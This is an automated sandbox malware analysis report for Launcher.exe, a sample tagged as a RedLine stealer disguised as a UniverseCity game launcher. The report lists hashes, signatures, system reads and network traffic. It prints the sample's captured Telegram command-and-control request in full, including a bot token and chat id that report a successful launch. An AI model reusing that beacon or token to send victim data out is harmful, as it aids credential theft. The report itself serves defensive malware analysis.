Windows Analysis Report
Launcher.exe

Overview

General Information

Sample Name: Launcher.exe
Analysis ID: 753414
MD5: ac30d9ee77f4a6e23dea621727579dc5
SHA1: 9dc851e691a4af49882138ee7c5bac1dc126becd
SHA256: d8f1870f30298302fce860d7c56257f6a11e4689642c3d5367d2392db5356bed
Tags: 185-206-213-32CosmicWayexeFakeGaliXCityRedLineStealerUniverseCity
Infos:

Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges

Classification

AV Detection
barindex
Machine Learning detection for sample
Source: Launcher.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Launcher.exe, 00000000.00000002.505090337.0000000002C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: Launcher.exe, 00000000.00000002.508132544.0000000005AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.506057740.0000000002E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/images/img_downloadwhite.png
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Launcher.exe, 00000000.00000003.245277692.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.508004314.00000000059FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://scripts.sil.org/OFL
Source: Launcher.exe String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLDosisExtraLightWeightLightMediumSemiBoldBoldExtr
Source: Launcher.exe String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLMontserratThinMontserratRomanWeightExtraLightLig
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.impallari.com
Source: Launcher.exe String found in binary or memory: http://www.impallari.comThis
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zkysky.com.ar/
Source: Launcher.exe String found in binary or memory: http://www.zkysky.com.ar/This
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Launcher.exe String found in binary or memory: https://api.telegram.org/bot
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage
Source: Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/invite/universecity
Source: Launcher.exe String found in binary or memory: https://discord.com/invite/universecityGhttps://twitter.com/UniverseCityP2E3https://universe-city.io
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245316162.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245301155.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245327352.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/JulietaUla/Montserrat)
Source: Launcher.exe String found in binary or memory: https://github.com/JulietaUla/Montserrat)Montserrat
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/UniverseCityP2E
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://universe-city.io/
Source: Launcher.exe String found in binary or memory: https://universe-city.io/download/UniverseCity.zip
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: global traffic HTTP traffic detected: GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Sample file is different than original file name gathered from version info
Source: Launcher.exe, 00000000.00000000.239074629.0000000000706000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Launcher.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Launcher.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Launcher.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal48.troj.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Launcher.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Launcher.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Launcher.exe Static file information: File size 1126912 > 1048576
Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe
Binary contains a suspicious time stamp
Source: Launcher.exe Static PE information: 0xAAC8B1A6 [Sun Oct 17 22:56:38 2060 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.109491085129885
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Launcher.exe Window / User API: threadDelayed 1859 Jump to behavior
Source: Launcher.exe, 00000000.00000002.508111341.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\Launcher.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Memory allocated: page read and write | page guard Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 753414 Sample: Launcher.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 48 10 Machine Learning detection for sample 2->10 12 Uses the Telegram API (likely for C&C communication) 2->12 5 Launcher.exe 15 2 2->5         started        process3 dnsIp4 8 api.telegram.org 149.154.167.220, 443, 49702 TELEGRAMRU United Kingdom 5->8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True false
    		high